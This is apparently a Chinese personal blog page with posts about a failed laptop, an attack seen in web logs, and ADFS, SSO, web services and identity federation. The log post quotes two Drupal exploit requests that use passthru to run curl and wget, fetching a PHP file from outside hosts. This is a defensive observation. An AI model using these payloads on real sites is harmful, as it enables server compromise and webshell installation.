電腦掛掉了

使用了8年的notebook終於不行了, 出現問題時曾嘗試買新的螢幕連接線來自己更換, 但螢幕還是依舊白化, 雖然外接螢幕是還能使用但覺得太麻煩, 而且舊電腦效能也變差, 外殼被我拆爛裡面排線也都老化, 不想再浪費錢買新面板來試, 最後只能放棄

從 Web Log 學習系統漏洞 45

似乎又是利用 Drupal 的漏洞作攻擊, 不過這次多了一堆看不懂的鬼東西
其中有幾段會連到伊朗的網站下載東西

216.194.173.143 - - [22/Jul/2019:11:17:10 +0800] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl+-O+sites/default/files/style.php+'http://www.phpro.ir/wp-includes/widgets/style.aff' HTTP/1.1" 403 209

216.194.173.143 - - [22/Jul/2019:11:17:16 +0800] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=curl%20http://wordpress.com.djcaa.org/style.php%20%7C%20wget%20http://wordpress.com.djcaa.org/style.php HTTP/1.1" 403 209

下載回來的檔案內容如同 log 中帶有 echo 指令後面接的文字所解碼後的鬼東西
(以base64加密的php/gif檔??)

伊朗的網站?

ADFS如何在B2B同盟中啟用SSO

在 B2B情況下一個企業需要存取另一個企業的應用程式或服務可以管理自己的使用者帳戶並定義自己的身份驗證機制, 另一個企業可以定義向組織外部的使用者公開哪些應用程式和服務以及它將接受哪些聲明來提供對應用程式的存取, 為了允許在這種情況下共享應用程式或服務, 企業必須建立同盟信任然後定義它們之間交換宣告的規則w-studio.idv.tw

ADFS如何在一個單一組織中啟用SSO

在單一組織中, 可以在下列情況下使用 ADFS啟用 SSO:

。應用程式可能不在基於 Windows的伺服器或任何支援 ADDS驗證的伺服器上執行, 或者它們可能在運行 Windows Server但未加入網域的伺服器上執行, 應用程式可能需要 SAML 或 Web服務進行身份驗證和授權w-studio.idv.tw

。在多個網域和樹系時, 多個樹系中的使用者可能需要存取相同的應用程式

。辦公室外部的使用者可能需要存取內部伺服器上執行的應用程式, 外部使用者可能從不屬於內部網域的電腦登入應用程式

Web Service(Web服務)

Web服務包含一組用於建立連接的應用程式和服務的規範, 其功能和介面透過 Web技術標準(例如 XML、簡單物件存取協定(SOAP)、Web服務描述語言(WSDL)、HTTP和HTTPS)向使用者公開, 使用 Web服務建立 Web應用程式的目標是簡化跨多個開發平台、技術和網路的應用程式的互通性w-studio.idv.tw

為了增強互通性, Web服務由 W3C及 OASIS定義:

。大多數 Web服務使用 XML透過 HTTP和 HTTPS傳輸資料, 透過 XML開發人員可以建立自己的客製化標籤, 從而促進應用程式和組織之間資料的定義、傳輸、驗證和解釋

。Web服務透過 SOAP協定向 Web使用者公開有用的功能, SOAP是定義訊息的 XML格式的規範, 描述有效的 XML文件的外觀

。Web服務提供了一種足夠詳細地描述其介面的方法, 以允許使用者建立用戶端應用程式來與服務進行通訊, 此描述通常在 WSDL的 XML文件中提供, 它描述一組 SOAP訊息以及如何交換這些訊息w-studio.idv.tw

。註冊 Web服務以便用戶可以透過通用描述、發現和整合(Universal Description, Discovery, and Integration, UDDI)輕鬆找到它們, UDDI目錄條目是一個 XML文件, 用於描述業務及其提供的服務

Web Service

什麼是基於宣告的身份(Claims-based Identity)及基於宣告的驗證(Claims-based Authentication)

在ADFS的環境下, 基於宣告的身份(Claims-based Identity) 和基於宣告的驗證(Claims-based Authentication)是核心概念, 它們是用來描述身份驗證和授權的方法:

基於宣告的身份(Claims-based Identity)

在基於宣告的身份模型中, 身份不是直接給定的而是通過"宣告"來描述的, 這些宣告是關於用戶的信息, 如他們的名稱、電子郵件地址、角色、許可權等w-studio.idv.tw

在ADFS中, 當用戶嘗試訪問某個應用程式或資源時, ADFS會發出一個或多個宣告給該應用程式, 這些宣告包含了有關用戶身份和許可權的信息, 這些宣告可以被用來決定用戶是否有權訪問該應用程式以及他們可以執行什麼操作

例如一個身份宣告可能是: "我是John, 在這個組織中的角色是管理員, 我有權訪問此資源"

基於宣告的驗證(Claims-based Authentication)

在基於宣告的驗證模型中, 身份驗證的過程是基於宣告的, 當用戶嘗試登入或訪問某個應用程式時, 他們會提交一些宣告而不僅僅是帳戶名稱和密碼w-studio.idv.tw

在ADFS中, 基於宣告的驗證涉及以下步驟:

1. 用戶登入: 用戶提交他們的身份信息, 如帳戶名稱和密碼

2. 宣告的發出: ADFS驗證用戶的身份然後發出一個或多個宣告, 這些宣告包含了用戶的身份和相關的角色或許可權信息w-studio.idv.tw

3. 宣告的驗證: 應用程式或資源使用這些宣告來驗證用戶的身份和授予許可權, 以確定用戶是否有權訪問該資源

什麼是身份同盟(Identity Federation)

在 Windows Server中, 身份同盟(Identity Federation)是一種身份和身份驗證的解決方案, 它允許不同的組織或服務提供者在彼此之間建立信任關係, 以便共享身份和授權資訊, 這意味著當用戶在一個組織或服務中進行身份驗證後, 他們可以使用這個身份在另一個組織或服務中存取資源而不需要重新驗證, 它提供了一種強大且靈活的方式來管理和驗證用戶的身份和授權

在 ADFS中, 身份同盟通常是透過"信賴關係"(Trust Relationships)來實現的, ADFS可以作為身份提供者(Identity Provider，IdP)和服務提供者(Service Provider，SP)的角色, 當組織之間建立了信賴關係後, ADFS可以作為身份提供者發出和管理權仗(token), 並作為服務提供者驗證這些權仗w-studio.idv.tw

你也可以在單一組織內使用身分同盟, 例如組織可能會規劃部署多個需要身份驗證基於 Web的應用程式, 透過使用 ADFS組織可以為所有應用程式實施一種身份驗證解決方案, 使多個內部網域或樹系中的使用者可以輕鬆存取應用程式, 該解決方案未來可以擴展到外部合作夥伴而無需開發人員更改應用程式

身份同盟的工作原理如下:

1. 建立信任: 首先 ADFS允許組織建立信任關係, 這通常是透過安全的憑證和金鑰來實現

2. 用戶身份驗證: 當用戶在其中一個組織或服務中進行身份驗證時, 這個組織或服務會發出一個安全的憑證或權仗w-studio.idv.tw

3. 權仗的使用: 用戶可以使用這個安全的權仗在其他參與身份同盟的組織或服務中存取資源而不需要再次進行身份驗證

4. 權仗的驗證: 受信任的組織或服務使用這個權仗來驗證用戶的身份和授權, 並授予或拒絕存取資源的權限

什麼是ADFS (Active Directory Federation Services, AD同盟服務)

Active Directory Federation Services (ADFS)是 Windows Server中的一個角色, 它提供了一個身份驗證和授權解決方案, 允許用戶在同一時間內使用單一的身份進行身份驗證, 即所謂的單點登入(Single Sign-On, SSO), ADFS能夠建立信任關係, 並提供安全、整合的身份管理功能, 使組織能夠與其他組織或雲端服務提供者共享資源

簡單解釋, 如下圖常見的第三方網站帳號登入方式, 就是一種 ADFS的應用, 不過 ADFS提供了更多設定及控制